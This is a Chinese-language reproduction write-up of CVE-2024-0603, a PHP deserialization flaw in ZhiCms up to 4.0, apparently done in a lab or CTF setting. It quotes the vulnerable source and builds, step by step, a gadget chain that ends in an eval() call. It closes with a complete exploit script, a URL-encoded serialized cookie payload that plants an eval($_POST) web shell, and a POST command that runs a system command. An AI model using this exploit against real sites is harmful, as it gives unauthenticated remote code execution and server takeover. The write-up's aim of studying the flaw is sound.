CVE-2024-0603 漏洞复现

CVE-2024-0603

源码：https://gitee.com/dazensun/zhicms

开题：

CVE-2024-0603描述：ZhiCms up to 4.0版本的文件app/plug/controller/giftcontroller.php中存在一处未知漏洞。攻击者可以通过篡改参数mylike触发反序列化，从而远程发起攻击。该漏洞被公开披露，并可能被利用。此漏洞的相关标识为VDB-250839。

链子就不自己挖了，直接用网上有的，自己复现理解一遍吧。

链子：

simple_html_dom::__destruct() -> simple_html_dom::clear() -> MemcacheDriver::clear() ->simple_html_dom_node::__toString() ->simple_html_dom_node::outertext() -> 
Template::display() -> Template::compile()

倒着分析，所有涉及代码如下：

\ZhiCms\base\Template.php

<?php
namespace ZhiCms\base;
class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct($config) {$this->config = $config;$this->assign('__Template', $this);$this->label = array(         /**variable label{$name} => <?php echo $name;?>{$user['name']} => <?php echo $user['name'];?>{$user.name}    => <?php echo $user['name'];?>*/  '/{(\\$[a-zA-Z_]\w*(?:\[[\w\.\"\'\[\]\$]+\])*)}/i' => "<?php echo $1; ?>",'/\$(\w+)\.(\w+)\.(\w+)\.(\w+)/is' => "\$\\1['\\2']['\\3']['\\4']",'/\$(\w+)\.(\w+)\.(\w+)/is' => "\$\\1['\\2']['\\3']",'/\$(\w+)\.(\w+)/is' => "\$\\1['\\2']",/**constance label{CONSTANCE} => <?php echo CONSTANCE;?>*/'/\{([A-Z_\x7f-\xff][A-Z0-9_\x7f-\xff]*)\}/s' => "<?php echo \\1;?>",/**msubstr label{musbstr str="test"  min="0" max="20"}   msubstr($str, 0, 20);**/'/{musbstr\s*str=(\S+)\+min=\"(.*)\"\+max=\"(.*)\"}/i'=>"<?php echo\\1;echo\\2;echo\\3;?>",/**if label{if $name==1}       =>  <?php if ($name==1){ ?>{elseif $name==2}   =>  <?php } elseif ($name==2){ ?>{else}              =>  <?php } else { ?>{/if}               =>  <?php } ?>*/              '/\{if\s+(.+?)\}/' => "<?php if(\\1) { ?>",'/\{else\}/' => "<?php } else { ?>",'/\{elseif\s+(.+?)\}/' => "<?php } elseif (\\1) { ?>",'/\{\/if\}/' => "<?php } ?>",/**for label{for $i=0;$i<10;$i++}   =>  <?php for($i=0;$i<10;$i++) { ?>{/for}                  =>  <?php } ?>*/              '/\{for\s+(.+?)\}/' => "<?php for(\\1) { ?>",'/\{\/for\}/' => "<?php } ?>",/**foreach label{foreach $arr as $vo}           =>  <?php $n=1; if (is_array($arr) foreach($arr as $vo){ ?>{foreach $arr as $key => $vo}   =>  <?php $n=1; if (is_array($array) foreach($arr as $key => $vo){ ?>{/foreach}                  =>  <?php $n++;}unset($n) ?> */'/\{foreach\s+(\S+)\s+as\s+(\S+)\}/' => "<?php \$n=1;if(is_array(\\1)) foreach(\\1 as \\2) { ?>", '/\{foreach\s+(\S+)\s+as\s+(\S+)\s*=>\s*(\S+)\}/' => "<?php \$n=1; if(is_array(\\1)) foreach(\\1 as \\2 => \\3) { ?>",'/\{\/foreach\}/' => "<?php \$n++;}unset(\$n); ?>",/**function label{date('Y-m-d H:i:s')}   =>  <?php echo date('Y-m-d H:i:s');?> {$date('Y-m-d H:i:s')}  =>  <?php echo $date('Y-m-d H:i:s');?> */'/\{([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/' => "<?php echo \\1;?>",'/\{(\\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/' => "<?php echo \\1;?>", );$this->cache = new Cache( $this->config['TPL_CACHE'] );}public function assign($name, $value = '') {if( is_array($name) ){foreach($name as $k => $v){$this->vars[$k] = $v;}} else {$this->vars[$name] = $value;}}public function display($tpl = '', $return = false, $isTpl = true ) {if( $return ){if ( ob_get_level() ){ob_end_flush();flush(); } ob_start();}extract($this->vars, EXTR_OVERWRITE);eval('?>' . $this->compile( $tpl, $isTpl));if( $return ){$content = ob_get_contents();ob_end_clean();return $content;}}	public function compile( $tpl, $isTpl = true ) {if( $isTpl ){$tplFile = $this->config['TPL_PATH'] . $tpl . $this->config['TPL_SUFFIX'];if ( !file_exists($tplFile) ) {throw new \Exception("Template file '{$tplFile}' not found", 500);}$tplKey = md5(realpath($tplFile));				} else {$tplKey = md5($tpl);}$ret = unserialize( $this->cache->get( $tplKey ) );	if ( empty($ret['template']) || ($isTpl&&filemtime($tplFile)>($ret['compile_time'])) ) {$template = $isTpl ? file_get_contents( $tplFile ) : $tpl;if( false === Hook::listen('templateParse', array($template), $template) ){foreach ($this->label as $key => $value) {$template = preg_replace($key, $value, $template);}		}$ret = array('template'=>$template, 'compile_time'=>time());$this->cache->set( $tplKey, serialize($ret), 86400*365);}	return $ret['template'];}
}

\ZhiCms\base\Cache.php

<?php
namespace ZhiCms\base;
class Cache{protected $config =array();protected $cache = 'default';public $proxyObj=null;public $proxyExpire=1800;protected static $objArr = array();public function __construct( $cache = 'default' ) {if( $cache ){$this->cache = $cache;}$this->config = Config::get('CACHE.' . $this->cache);if( empty($this->config) || !isset($this->config['CACHE_TYPE']) ) {throw new \Exception($this->cache.' cache config error', 500);}}public function __call($method, $args){if( !isset(self::$objArr[$this->cache]) ){		$cacheDriver = __NAMESPACE__.'\cache\\' . ucfirst( $this->config['CACHE_TYPE'] ).'Driver';if( !class_exists($cacheDriver) ) {throw new \Exception("Cache Driver '{$cacheDriver}' not found'", 500);}	self::$objArr[$this->cache] = new $cacheDriver( $this->config );}if( $this->proxyObj ){ //proxy mode$key = md5( get_class($this->proxyObj) . '_'.$method.'_' . var_export($args) );$value = self::$objArr[$this->cache]->get($key);if( false===$value ){$value = call_user_func_array(array($this->proxyObj, $method), $args);self::$objArr[$this->cache]->set($key, $value, $this->proxyExpire);}return $value;}else{return call_user_func_array(array(self::$objArr[$this->cache], $method), $args);}		}
}

\ZhiCms\ext\simple_html_dom.php

<?php
namespace ZhiCms\ext;
class simple_html_dom_node
{private $dom = null;function __toString(){return $this->outertext();}function outertext(){if ($this->dom && $this->dom->callback!==null){call_user_func_array($this->dom->callback, array($this));}}
}
class simple_html_dom
{public $callback = null;protected $parent;
// .......function __destruct(){$this->clear();}// .......function clear(){foreach ($this->nodes as $n) {$n->clear(); $n = null;}// This add next line is documented in the sourceforge repository. 2977248 as a fix for ongoing memory leaks that occur even with the use of clear.if (isset($this->children)) foreach ($this->children as $n) {$n->clear(); $n = null;}if (isset($this->parent)) {$this->parent->clear(); unset($this->parent);}if (isset($this->root)) {$this->root->clear(); unset($this->root);}unset($this->doc);unset($this->noise);}
// .......
}

ZhiCms\base\cache\MemcacheDriver.php

<?php
namespace ZhiCms\base\cache;
class MemcacheDriver implements CacheInterface{protected $mmc = NULL;protected $group = ''; protected $ver = 0;public function __construct( $config = array() ) {$this->mmc = new Memcache;if( empty($config) ) {$config['MEM_SERVER'] = array(array('127.0.0.1', 11211));$config['GROUP'] = '';}foreach($config['MEM_SERVER'] as $v) {call_user_func_array(array($this->mmc, 'addServer'), $v);}if( isset($config['GROUP']) ){$this->group = $config['GROUP'];}$this->ver = intval( $this->mmc->get($this->group.'_ver') );}public function get($key) {return $this->mmc->get($this->group.'_'.$this->ver.'_'.$key);}public function set($key, $value, $expire = 1800) {return $this->mmc->set($this->group.'_'.$this->ver.'_'.$key, $value, 0, $expire);}public function inc($key, $value = 1) {return $this->mmc->increment($this->group.'_'.$this->ver.'_'.$key, $value);}public function des($key, $value = 1) {return $this->mmc->decrement($this->group.'_'.$this->ver.'_'.$key, $value);}public function del($key) {return $this->mmc->delete($this->group.'_'.$this->ver.'_'.$key);}public function clear() {return  $this->mmc->set($this->group.'_ver', $this->ver+1); }	
}

==1、==首先看看链子的最末尾Template::display() -> Template::compile()

在\ZhiCms\base\Template.php

有个eval方法，参数可控就可以导致RCE

构造一下就可以使得eval可控，执行任意命令。构造如下：

class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct(){$this->cache = new Cache;$this->vars=array("tpl"=>"<?php system('cat /f*');?>","isTpl"=>false);}
}

2、simple_html_dom_node::outertext() -> Template::display()

代码有点多，是从这里跳过去到Template::display()的

对应部分exp构造如下：

class simple_html_dom_node
{private $dom = null;public function __construct(){$dom = new simple_html_dom("");$dom->callback=array(new Template(), "display");$this->dom = $dom;}
}

3、simple_html_dom_node::__toString() ->simple_html_dom_node::outertext()

直接就能过去

4、MemcacheDriver::clear() ->simple_html_dom_node::__toString()

MemcacheDriver的clear()方法中将$this->group拼接字符串’_ver’,所以可以触发simple_html_dom_node中的__toString()方法

对应部分exp构造如下：

class MemcacheDriver
{protected $mmc = NULL;protected $group = '';protected $ver = 0;public function __construct(){$this->mmc = new Cache();$this->group = new simple_html_dom_node;}
}

5、simple_html_dom::clear() -> MemcacheDriver::clear()

对应部分exp构造：

//.........namespace ZhiCms\ext;
use ZhiCms\base\cache\MemcacheDriver;
use ZhiCms\base\Template;
use zhicms\base\Cache;
class simple_html_dom
{protected $parent;public $callback = null;public function __construct($obj){$this->parent = $obj;}
}//.........$step = new MemcacheDriver;
$exp = new simple_html_dom($step);

6、simple_html_dom::__destruct() -> simple_html_dom::clear()

直接就能过去

最终EXP：

<?php
namespace ZhiCms\base{class Cache{protected $config =array();protected $cache = 'default';public $proxyObj=null;public $proxyExpire=1800;public function __construct(){$this->config = array("CACHE_TYPE"=>"FileCache","MEM_GROUP"=>"tpl");}}class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct(){$this->cache = new Cache;$this->vars=array("tpl"=>'<?php eval($_POST[1]);?>',"isTpl"=>false);}}
}namespace ZhiCms\base\cache{use ZhiCms\ext\simple_html_dom_node;use ZhiCms\base\Cache;class MemcachedDriver{protected $mmc = NULL;protected $group = '';protected $ver = 0;public function __construct(){$this->mmc = new Cache();$this->group=new simple_html_dom_node();}}
}namespace ZhiCms\ext{use ZhiCms\base\cache\MemcachedDriver;use ZhiCms\base\Template;use ZhiCms\base\Cache;class simple_html_dom{protected $parent;public $callback;public function __construct($obj){$this->parent=$obj;}}class simple_html_dom_node{private $dom = null;public function __construct(){$dom=new simple_html_dom("");$dom->callback=array(new Template(),"display");// $dom->callback="phpinfo";$this->dom=$dom;}}$mem = new MemcachedDriver();$obj = new simple_html_dom($mem);echo urlencode(serialize($obj));
}

payload：

GET：?r=plug/gift/mylikeCookie：mylike=O%3A26%3A%22ZhiCms%5Cext%5Csimple_html_dom%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00parent%22%3BO%3A33%3A%22ZhiCms%5Cbase%5Ccache%5CMemcachedDriver%22%3A3%3A%7Bs%3A6%3A%22%00%2A%00mmc%22%3BO%3A17%3A%22ZhiCms%5Cbase%5CCache%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A10%3A%22CACHE_TYPE%22%3Bs%3A9%3A%22FileCache%22%3Bs%3A9%3A%22MEM_GROUP%22%3Bs%3A3%3A%22tpl%22%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3Bs%3A7%3A%22default%22%3Bs%3A8%3A%22proxyObj%22%3BN%3Bs%3A11%3A%22proxyExpire%22%3Bi%3A1800%3B%7Ds%3A8%3A%22%00%2A%00group%22%3BO%3A31%3A%22ZhiCms%5Cext%5Csimple_html_dom_node%22%3A1%3A%7Bs%3A36%3A%22%00ZhiCms%5Cext%5Csimple_html_dom_node%00dom%22%3BO%3A26%3A%22ZhiCms%5Cext%5Csimple_html_dom%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00parent%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22callback%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A20%3A%22ZhiCms%5Cbase%5CTemplate%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22%00%2A%00label%22%3BN%3Bs%3A7%3A%22%00%2A%00vars%22%3Ba%3A2%3A%7Bs%3A3%3A%22tpl%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3Bs%3A5%3A%22isTpl%22%3Bb%3A0%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3BO%3A17%3A%22ZhiCms%5Cbase%5CCache%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A10%3A%22CACHE_TYPE%22%3Bs%3A9%3A%22FileCache%22%3Bs%3A9%3A%22MEM_GROUP%22%3Bs%3A3%3A%22tpl%22%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3Bs%3A7%3A%22default%22%3Bs%3A8%3A%22proxyObj%22%3BN%3Bs%3A11%3A%22proxyExpire%22%3Bi%3A1800%3B%7D%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00ver%22%3Bi%3A0%3B%7Ds%3A8%3A%22callback%22%3BN%3B%7DPOST：1=system('tac /denfjkehfiofleffagww');